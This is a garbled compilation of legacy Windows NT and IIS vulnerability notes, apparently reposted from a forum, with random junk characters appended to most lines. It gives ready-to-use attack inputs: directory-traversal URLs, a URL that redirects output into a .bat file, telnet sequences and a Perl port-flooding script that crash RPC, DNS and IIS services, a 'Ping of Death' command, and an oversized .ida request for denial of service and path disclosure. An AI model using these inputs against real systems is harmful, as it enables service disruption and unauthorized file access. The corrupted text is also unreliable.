受影響系統(tǒng):4.0,iis 1.0
1 @7 E' @! s: C/ i* [2 i/ L9 i- wA URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.) ]% h% Y5 h% L( `% h4 E
8 Q( }# m2 W5 M. ]
A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.3 P. U$ P. ?. i( x
! \8 [+ U5 r r1 V0 m4 j* NBy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.6 I' u2 Z+ V2 d+ K& t
! p6 X/ |# I, e4 T4 G3 A; y& q/ P--------------------------------------------------------------------
/ x0 [ U) \3 I% S! B( k
% e3 T/ F( a1 k* c% T受影響系統(tǒng):4.0# p/ k; t2 Y/ A6 }- u6 n
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.% f9 a, D: w0 T. \7 V: H
* c( z4 u9 }% s% FIf the file 'target.bat' exists, the file will be truncated.% l- i/ W6 A3 Y0 c$ u8 [
! k8 q2 ^; v' y: s G1 k- l* K3 V9 Z; B% j; \) W' B
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.4 g8 V( v% q- k
. C* v! p T: l6 Y7 M
----------------------------------------------------------------------7 ?! S1 V3 u6 |1 g: h( Z
0 F( z2 H/ V# X3 l
受影響系統(tǒng):3.51,4.05 R1 i$ {: W9 P9 j1 n9 ~6 }
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.
+ z& w: a8 H2 g' d
9 M7 Q k8 }9 t8 ZThe following steps;" p3 a' R7 [- c" P7 A
6 ^2 X4 Y2 U c9 y8 P* A. ETelnet to an NT 4.0 system on port 135 V7 G" A: p. Y5 B1 {/ {, _
Type about 10 characters followed by a <CR> : ]$ N6 t7 V0 `! x
Exit Telnet
/ w& H6 x9 |2 @3 D6 d0 T A& Cresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
1 U9 y5 t5 B& [5 f0 N
% F. T$ J. W. j" e. l" DWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
7 ~' b, m3 G; Y/ C' @
$ Q) h! g" {- B- Z; Y' P- cThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
& I F/ \7 ?& ?! H' \0 q
' P# d P5 d- z* J, H lIf a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.: P9 C \' g. z, O' `8 ~1 R2 X
" l( u0 ]5 F4 R4 C, LThe following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):- @5 d. P; i$ X1 F: R) e- o
3 M6 t2 E& S4 k3 L/*begin poke code*/7 E; m7 k6 y& P N) r
9 S: N# h \7 o7 S7 iuse Socket;8 B; M. _9 ?' Y6 ?
use FileHandle;* ? p/ A+ D1 ^6 ^) y: s/ t7 v- g: p
require "chat2.pl";- ]9 R A2 Q- F. }0 L" h8 h( H
0 [" m1 |% M% u7 x# L6 a) s
$systemname = $ARGV[0] && shift;; `/ D" h9 T% w. k6 l0 |- \0 q
* t8 X5 o! |2 P/ \3 ?4 I$verbose = 1; # tell me what you're hitting
4 ~- |5 P: J* y0 E/ V$knownports = 1; # don't hit known problem ports5 e. m! v5 V. N+ d/ U; g( U
for ($port = $0; $port<65535; $port++) 1 l" l7 b+ C, A8 U$ t3 O
{" `' k1 l- w" j9 G4 x1 e
I1 w/ a1 X8 q( G5 L
& { |* c6 b; e7 {, e, [8 Qif ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
' n$ N' R" S' H. ^6 H0 m+ h" }next;
9 W# D9 e5 G4 M4 t}
" L! b k$ w6 |8 s( H& a# b; S$fh = chat::open_port($systemname, $port);; E+ J; R* M1 A, G9 p* B3 m7 G
chat::print ($fh,"This is about ten characters or more");2 D+ t0 L7 O' v: U1 F8 m
if ($verbose) {, f7 I" l9 e1 B8 z2 ^
print "Trying port: $port\n";
# Y7 v; A& h9 k+ ~9 `+ T! P# t3 }} * ]- d8 q8 Y/ C3 W( n- Y" G
chat::close($fh);
" e, X8 Q6 C% a0 r7 p7 w8 V8 C/ E3 k% C( J! t, ^3 c1 x# {
}3 M* Y5 p/ B: k7 T; h0 y+ u g
& ^& y, e4 |5 W7 X# F3 F2 |" h3 [& P/ C
/*end poke code*/
$ B( Y0 L4 x' C8 P8 ?# v5 w$ d6 {0 D B$ [
Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername2 {9 n4 H( w3 u. v, U/ \
0 H, J4 d& L' p1 P* Y
--------------------------------------------------------------------------------, _, F$ X$ P' \1 d4 W$ v' A5 G
# w0 Q Y! r& B/ S+ H
受影響系統(tǒng):4.00 t/ k" x8 w, ?! }1 ]" X
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.; Q8 G$ O, P" t1 I9 {
" o! x& y# X' @9 j4 cThis attack causes Dr. Watson to display an alert window and to log an error: ( v; c$ \- {6 c/ k6 C6 X0 c4 p
& e5 `- @. W& z; f% L& S! Z' [- {
"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
* e5 `" C) ~+ R \2 ? [- L `& J
--------------------------------------------------------------------------------9 `. N0 u$ m% G
5 T1 g4 ^9 w% n3 F3 X+ E8 ?受影響系統(tǒng):3.51,4.07 P8 u( k2 ]. l0 j" L
Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
: Q0 y1 b' n6 |
1 A6 O; B( [8 o4 T* u5 OSTOP: 0X0000001E
1 D% n5 q# f* G! E0 EKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS- N3 _7 w/ J+ \( z1 |0 I9 Z/ S! Y
, {; s$ G+ \, k: w& `6 f-OR-
' m8 y5 ~. `" M. n2 p$ d) p l! q
; ]4 F2 p9 S- `+ iSTOP: 0x0000000A
" ^" X. l8 H! f1 h. S3 n, kIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS' S8 L) E5 y# Y) G
' T$ n+ C. W% A+ INT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
& p" _+ S i/ E; h9 s; u9 @
2 p+ d& x5 j6 L* k+ n--------------------------------------------------------------------------------
, B V# `8 S1 J+ G4 j6 n7 g2 m- E3 f9 y" f( }2 \ j2 A
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
4 K$ p( j! c# J6 |7 {
" U& r1 q- i! z# q--------------------------------------------------------
4 M0 k9 \/ U' ?2 N( U* ?5 q! Q1 P
( C# x, u! ^# q6 G: w( ^% CIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server |